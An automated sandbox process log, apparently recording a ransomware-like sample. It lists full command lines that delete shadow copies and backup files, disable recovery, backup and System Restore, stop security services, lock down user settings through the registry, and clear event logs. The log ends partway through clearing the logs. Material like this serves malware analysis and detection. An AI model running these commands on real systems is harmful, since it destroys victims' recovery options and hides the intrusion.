C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:3752

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:2064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:4168

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:2788

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:1988

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:1544

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:4268

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:4960

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:1672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:4616

C:\Windows\system32\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:1516

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
4⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:3000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:1404

C:\Windows\system32\net.exe
net stop avpsus /y
3⤵
PID:3760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:4660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:4228

C:\Windows\system32\net.exe
net stop McAfeeDLPAgentService /y
3⤵
PID:2904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop mfewc /y
2⤵
PID:460

C:\Windows\system32\net.exe
net stop mfewc /y
3⤵
PID:1132

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:3964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
2⤵
PID:1968

C:\Windows\system32\net.exe
net stop BMR Boot Service /y
3⤵
PID:3512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:3152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
2⤵
PID:620

C:\Windows\system32\net.exe
net stop NetBackup BMR MTFTP Service /y
3⤵
PID:3660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:4124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
2⤵
PID:1956

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY start=disabled
3⤵
- Launches sc.exe
PID:1532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:2796

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches sc.exe
PID:1620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
2⤵
PID:3916

C:\Windows\system32\sc.exe
sc config SQLWriter start= disabled
3⤵
- Launches sc.exe
PID:2008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
2⤵
PID:1688

C:\Windows\system32\sc.exe
sc config SstpSvc start= disabled
3⤵
- Launches sc.exe
PID:820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
2⤵
PID:4508

C:\Windows\system32\taskkill.exe
taskkill /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
2⤵
PID:5024

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
2⤵
PID:4604

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:636

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
PID:4112

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:4872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
PID:3728

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:4196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
PID:3632

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
PID:624

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
PID:4008

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
PID:3416

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
PID:2596

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
PID:908

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
PID:904

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
PID:1804

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
PID:2232

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
PID:1672

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:3348

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
2⤵
PID:3504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
2⤵
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
2⤵
PID:3000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
2⤵
PID:2700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
2⤵
PID:1516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
2⤵
PID:1364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del %0
2⤵
PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
2⤵
PID:4576

C:\Windows\system32\attrib.exe
attrib +h +s hrmlog2
3⤵
- Views/modifies file attributes
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
2⤵
PID:276

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\hrmlog2
3⤵
- Views/modifies file attributes
PID:292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:3924

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:1540

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:4148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:4140

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
3⤵
PID:4276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1372

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
3⤵
PID:4228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:3824

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:3836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:3308

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:2484

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:1284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:1000

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:1968

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
3⤵
PID:4124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:3660

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:4828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:4440

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:960

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:3972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:1912

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:3088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:5052

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:2040

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:3356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:4560

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:2756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:2960

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:4896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:4604

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:3556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:396

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:1208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:3404

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:4996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:420

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:4908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:4444

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:1684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:2164

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:5116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:2696

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:1140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:4892

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:1396

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:4436

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:3980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:2704

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:2020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:2236

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:2988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:4932

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:2208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:3740

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:4944

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:3264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
2⤵
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
3⤵
PID:2272

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "AMSI/Debug"
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "AirSpaceChannel"
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
3⤵
- Clears Windows event logs
PID:3348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
3⤵
- Clears Windows event logs
PID:3504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "FirstUXPerf-Analytic"
3⤵
- Clears Windows event logs
PID:2116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
3⤵
- Clears Windows event logs
PID:3000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "General Logging"
3⤵
- Clears Windows event logs
PID:2700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
3⤵
- Clears Windows event logs
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "IHM_DebugChannel"
3⤵
- Clears Windows event logs
PID:1364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
3⤵
- Clears Windows event logs
PID:2472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
3⤵
- Clears Windows event logs
PID:4732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
3⤵
- Clears Windows event logs
PID:2476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
3⤵
- Clears Windows event logs
PID:288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
3⤵
- Clears Windows event logs
PID:2160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
3⤵
- Clears Windows event logs
PID:3056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
3⤵
- Clears Windows event logs
PID:2904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
3⤵
- Clears Windows event logs
PID:424

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
3⤵
- Clears Windows event logs
PID:2148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
3⤵
- Clears Windows event logs
PID:2324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationFrameServer"
3⤵
- Clears Windows event logs
PID:3992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProc"
3⤵
- Clears Windows event logs
PID:5032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProcD3D"
3⤵
- Clears Windows event logs
PID:2072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationAsyncWrapper"
3⤵
- Clears Windows event logs
PID:4924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationContentProtection"
3⤵
